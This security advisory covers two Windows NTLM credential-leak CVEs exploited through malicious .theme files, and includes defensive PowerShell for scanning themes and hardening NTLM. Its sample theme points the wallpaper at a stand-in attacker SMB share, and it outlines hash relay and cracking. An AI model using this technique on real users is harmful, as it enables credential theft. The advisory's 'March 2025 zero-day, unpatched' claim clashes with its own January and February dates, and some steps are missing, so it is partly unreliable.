
New zero-day vulnerability leaks NTLM authentication credentials on Windows


A new zero-day vulnerability has been discovered in the Windows operating system that allows attackers to steal a user's NTLM credentials simply by tricking them into viewing a malicious file in Windows Explorer.

Overview

In March 2025, several analysts discovered two critical Windows vulnerabilities, CVE-2025-21308 and CVE-2025-21377, that lead to the exposure of NTLM credentials. They allow an attacker to collect a user's NTLM credentials merely by getting the user to view a malicious file in Windows Explorer: for example, when the user opens a shared folder or USB drive containing the file, or views the Downloads folder into which the file was automatically downloaded from the attacker's website.

Currently, Microsoft has not released an official patch for these vulnerabilities. However, ACROS Security has provided unofficial patches through their 0patch service for all affected Windows versions. These patches are available for free until Microsoft releases an official patch.

Vulnerability Information

  1. CVE-2025-21308

    • Description: CVE-2025-21308 is a security vulnerability related to the Windows Themes feature in the Windows operating system, announced on January 14, 2025.

    • CVSS Score: 6.5

    • Severity Level: Medium

    • Impact: This vulnerability allows an attacker to perform spoofing by convincing a user to download and apply a malicious theme file.

  2. CVE-2025-21377

    • Description: CVE-2025-21377 is a security vulnerability related to the disclosure and spoofing of NTLM hashes in the Windows operating system, announced on February 11, 2025.

    • CVSS Score: 6.5

    • Severity Level: Medium

    • Impact: This vulnerability allows an attacker to collect a user's NTLMv2 credentials, which can lead to unauthorized access to the system and sensitive data.

Affected Versions

The vulnerabilities affect multiple versions of Windows, including:

  • Windows 10 (versions from 1507 to 22H2)

  • Windows 11 (versions from 22H2 to 24H2)

  • Windows Server 2008, 2012, 2016, 2019, 2022, and 2025

Vulnerability Details

The two vulnerabilities, CVE-2025-21308 and CVE-2025-21377, can be exploited in attack campaigns to steal NTLM credentials and perform spoofing attacks. Here is how an attacker might exploit these vulnerabilities in a targeted campaign:

Initially, attackers will exploit the CVE-2025-21308 (Windows Themes Spoofing) vulnerability to:

  • Trick users into downloading and applying a malicious Windows Theme file to steal NTLM credentials.

  • Facilitate NTLM relay attacks or brute-force password hash attacks.

To execute this, hackers need to create a .theme file with malicious content, where the wallpaper or sound scheme is customized to point to a remote SMB or WebDAV server controlled by the attacker.

Here, \\attacker-server\share\malicious.jpg is a remote SMB path. When Windows tries to load this wallpaper, it automatically sends the user's NTLMv2 hash to the attacker's server.

After creating the .theme file, the attacker will distribute it to victims using methods such as:

  • Sending via email as an attachment or download link.

  • Embedding in websites for users to unknowingly download.

  • Bundling in malicious software packages or game mods.

When users open or apply the .theme file, Windows will attempt to load the theme components (wallpaper, icons, sounds, etc.). If the theme has a wallpaper from a remote SMB/WebDAV path, Windows will automatically send the user's NTLMv2 credentials to the attacker's server.
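The leak described above only happens because a resource inside the .theme file points at a remote host. A defender can therefore detect a dangerous theme before anyone applies it by parsing the file (it is a plain INI file) and flagging any value that starts with a UNC path or an http(s) URL. The following PowerShell script is an added example and is not code from the original post; the function name Find-RemoteThemeReference and the temporary sample file are hypothetical, and the sample theme is constructed here using the remote path quoted in the post.

```powershell
# Added example (not from the original post): scan .theme files for resource
# values that point at a remote location (SMB UNC path or WebDAV/HTTP URL).
# Function name and sample file are hypothetical.
function Find-RemoteThemeReference {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
        [Alias('FullName')]
        [string]$Path
    )
    process {
        $section = ''
        $lineNo  = 0
        foreach ($line in Get-Content -LiteralPath $Path -ErrorAction Stop) {
            $lineNo++
            $trim = $line.Trim()
            if ($trim -match '^\[(.+)\]$') { $section = $Matches[1]; continue }   # INI section header
            if ($trim -eq '' -or $trim.StartsWith(';')) { continue }              # blank line or comment
            if ($trim -match '^([^=]+?)\s*=\s*(.*)$') {
                $key   = $Matches[1]
                $value = $Matches[2].Trim('"')
                # A UNC path (\\host\share), a forward-slash UNC, or an http(s)/file URL
                # makes Windows authenticate to that host when the theme is applied.
                if ($value -match '^(\\\\|//|https?://|file://)') {
                    [pscustomobject]@{
                        File    = $Path
                        Line    = $lineNo
                        Section = $section
                        Key     = $key
                        Value   = $value
                        Reason  = 'theme resource points to a remote host'
                    }
                }
            }
        }
    }
}

# Constructed sample: a theme whose wallpaper is the remote SMB path quoted in the post.
$sample = @"
[Theme]
DisplayName=Ocean

[Control Panel\Desktop]
Wallpaper=\\attacker-server\share\malicious.jpg
TileWallpaper=0
"@
$tmp = Join-Path $env:TEMP 'suspect.theme'
Set-Content -LiteralPath $tmp -Value $sample

# Scan the single sample file.
Find-RemoteThemeReference -Path $tmp | Format-Table Line, Section, Key, Value -AutoSize

# Sweep a user's Downloads folder, the location the post names as a trigger for the leak.
Get-ChildItem "$env:USERPROFILE\Downloads" -Recurse -Include *.theme -File -ErrorAction SilentlyContinue |
    Find-RemoteThemeReference
```

The scanner reports the Wallpaper entry of the sample because its value begins with a UNC prefix; a theme that only references local paths produces no output. It checks every key rather than just Wallpaper, since the post notes that sound-scheme entries can be redirected in the same way, and .themepack files are cabinet archives that would need to be extracted first.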

After capturing the victim's NTLMv2 hash (or relaying the authentication), the attacker continues with CVE-2025-21377 for two main purposes:

  • Relay the captured NTLM authentication to internal Windows services (SMB, RDP, LDAP, etc.).

  • Crack the NTLM hash offline to recover the victim's password.

From here, the attacker has two options:

  • Crack the NTLM hash by brute force

    • If the password is weak, the attacker can recover it with a tool such as Hashcat and log into the victim's Windows account.

  • Relay the NTLM authentication to other systems

    • If an internal system accepts NTLM authentication, the attacker can log into servers, access files, or gain administrative privileges.

Finally, after obtaining enough login information, the attackers will proceed with privilege escalation:

  • Use the collected information for privilege escalation.

  • Perform Pass-the-Hash attacks to move to other systems within the internal network.

Recommendations

  1. Update the system immediately

  2. Disable NTLM If Possible (turn off NTLM on Windows)

    • Open Local Security Policy (secpol.msc), go to:

    • Or use Group Policy:

  3. Block SMB/WebDAV Connections to the Internet

    • Block SMB access on port 445 and WebDAV on 80/443 using the Firewall.

    • Use Windows Defender Attack Surface Reduction (ASR) to automatically block SMB/WebDAV.

  4. Block Malicious Theme & Shortcut Files (.theme, .lnk, .html)

    • Do not open .theme, .themepack, .desktopthemepackfile from untrusted sources.

    • Block these extensions in email & browsers:

      • Use Microsoft Defender for Office 365 to block .theme, .lnk, .html files.
    • Block opening shortcut files from untrusted directories using Group Policy:

  5. Enable SMB Signing to Prevent NTLM Relay

    • If NTLM must be used, enable SMB Signing to prevent NTLM relay attacks.

  6. Use Multi-Factor Authentication (MFA)

    • If possible, require MFA on all administrative and critical accounts.
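Recommendations 2, 3 and 5 are Windows configuration changes, so they can be audited and applied from one script. The PowerShell below is an added example and is not code from the original post or from 0patch: the function names are hypothetical, while the registry values, SMB cmdlets and firewall cmdlet are standard Windows ones. It goes slightly beyond the post in two places: it restricts outgoing NTLM in audit mode first (the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers", which is the setting behind "turn off NTLM"), because deny mode breaks any legitimate NTLM-only service, and it reports the WebClient service, which is the WebDAV redirector that a failed SMB connection falls back to. Run it from an elevated session.

```powershell
# Added example (not from the original post): audit and apply the NTLM-related
# hardening from the recommendations. Function names are hypothetical.
$Msv1Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$LsaPath  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$RuleName = 'Block outbound SMB (TCP 445) to Internet'   # hypothetical rule name

function Get-NtlmExposureReport {
    # RestrictSendingNTLMTraffic: 0 = allow all, 1 = audit all, 2 = deny all outgoing NTLM.
    $outgoing = (Get-ItemProperty -Path $Msv1Path -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
    # LmCompatibilityLevel 5 = send NTLMv2 only and refuse LM/NTLMv1 (OS default is 3).
    $lmLevel  = (Get-ItemProperty -Path $LsaPath -ErrorAction SilentlyContinue).LmCompatibilityLevel
    $smbClient = Get-SmbClientConfiguration
    $smbServer = Get-SmbServerConfiguration
    # WebClient is the WebDAV redirector; without it a UNC that fails over SMB is not retried over WebDAV.
    $webclient = Get-Service -Name WebClient -ErrorAction SilentlyContinue
    [pscustomobject]@{
        OutgoingNtlmPolicy       = switch ($outgoing) { 1 { 'audit' } 2 { 'deny' } default { 'allow (not configured)' } }
        LmCompatibilityLevel     = if ($null -eq $lmLevel) { 'not configured (default 3)' } else { $lmLevel }
        SmbClientSigningRequired = $smbClient.RequireSecuritySignature
        SmbServerSigningRequired = $smbServer.RequireSecuritySignature
        WebDavRedirectorStartup  = if ($webclient) { $webclient.StartType } else { 'not installed' }
        OutboundSmb445Blocked    = [bool](Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)
    }
}

function Set-NtlmHardening {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # Start with 'audit'; move to 'deny' only after the audit log shows no legitimate outgoing NTLM.
        [ValidateSet('audit', 'deny')] [string]$OutgoingNtlm = 'audit'
    )
    $value = if ($OutgoingNtlm -eq 'deny') { 2 } else { 1 }
    if ($PSCmdlet.ShouldProcess($Msv1Path, "RestrictSendingNTLMTraffic=$value")) {
        New-ItemProperty -Path $Msv1Path -Name RestrictSendingNTLMTraffic -PropertyType DWord -Value $value -Force | Out-Null
    }
    if ($PSCmdlet.ShouldProcess($LsaPath, 'LmCompatibilityLevel=5')) {
        New-ItemProperty -Path $LsaPath -Name LmCompatibilityLevel -PropertyType DWord -Value 5 -Force | Out-Null
    }
    # Recommendation 5: require SMB signing on both client and server to defeat relay.
    if ($PSCmdlet.ShouldProcess('SMB client and server', 'require security signature')) {
        Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
        Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    }
    # Recommendation 3: block SMB to Internet addresses so a UNC wallpaper cannot reach an external host.
    if (-not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue) -and
        $PSCmdlet.ShouldProcess('Windows Firewall', "create rule '$RuleName'")) {
        New-NetFirewallRule -DisplayName $RuleName -Direction Outbound -Protocol TCP -RemotePort 445 `
            -RemoteAddress Internet -Action Block -Profile Any | Out-Null
    }
}

function Get-OutgoingNtlmAuditEvent {
    param([int]$Hours = 24)
    # Once RestrictSendingNTLMTraffic is set to audit, each outgoing NTLM authentication is
    # recorded as event 8001 in Microsoft-Windows-NTLM/Operational with the target server
    # and the client process, which is exactly the trace a theme-triggered leak leaves.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-NTLM/Operational'
        Id        = 8001
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
}

Get-NtlmExposureReport | Format-List
Set-NtlmHardening -WhatIf                      # preview; drop -WhatIf to apply in audit mode
Get-OutgoingNtlmAuditEvent -Hours 24 | Format-Table -AutoSize
```

Run the report first, apply the changes with -WhatIf to see what would be touched, then apply them for real and review the 8001 events for a few days. Any target server that appears there and is not expected (an Internet host, or an internal host that should be using Kerberos) is either a leak in progress or a dependency that must be fixed before switching -OutgoingNtlm to 'deny'.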

Conclusion

Both CVE-2025-21308 and CVE-2025-21377 are serious NTLM-related vulnerabilities that can be exploited to collect NTLM hashes and then perform relay attacks or brute-force password attacks. Without proper protective measures, exploitation of these two vulnerabilities poses significant risk. Updating systems and applying the security measures above are therefore the best ways to protect businesses and users from these attacks.

